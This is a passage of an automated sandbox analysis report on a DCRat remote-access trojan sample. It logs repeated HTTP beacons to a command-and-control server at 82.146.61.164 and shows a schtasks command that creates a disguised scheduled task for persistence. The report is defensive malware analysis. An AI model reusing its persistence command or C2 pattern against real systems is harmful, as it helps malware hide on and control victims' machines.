Apr 23, 2024 14:48:25.835051060 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:48:25.835088968 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:48:25.835303068 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:48:26.071300030 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:48:26.072690964 CEST	586	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6 HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 82.146.61.164
Apr 23, 2024 14:48:26.309322119 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:26 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.5	49723	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:48:34.771184921 CEST	584	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:48:35.014450073 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:34 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:48:35.014610052 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:48:35.014651060 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:48:35.014858007 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:48:35.014897108 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:48:35.015079975 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:48:35.015120029 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:48:35.015314102 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:48:35.015351057 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:48:35.015422106 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:48:35.258491993 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:48:35.260272026 CEST	560	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 82.146.61.164
Apr 23, 2024 14:48:35.503592014 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:35 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49724	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:48:49.756007910 CEST	715	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:48:49.999279976 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:49 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:48:49.999561071 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:48:49.999599934 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:48:49.999663115 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:48:49.999701023 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:48:50.000232935 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:48:50.000271082 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:48:50.000489950 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:48:50.000528097 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:48:50.000659943 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:48:50.243073940 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:48:50.244282007 CEST	691	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 82.146.61.164
Apr 23, 2024 14:48:50.487709999 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:50 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Target ID:	0
Start time:	14:46:52
Start date:	23/04/2024
Path:	C:\Users\user\Desktop\B9exXW7c3t.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\B9exXW7c3t.exe"
Imagebase:	0x990000
File size:	1'433'600 bytes
MD5 hash:	13AEDA86AAFDE4051D7CA9280DAC9A67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2023417505.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2023417505.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2025245210.0000000012E8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:46:53
Start date:	23/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /f
Imagebase:	0x7ff7aa890000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:46:53
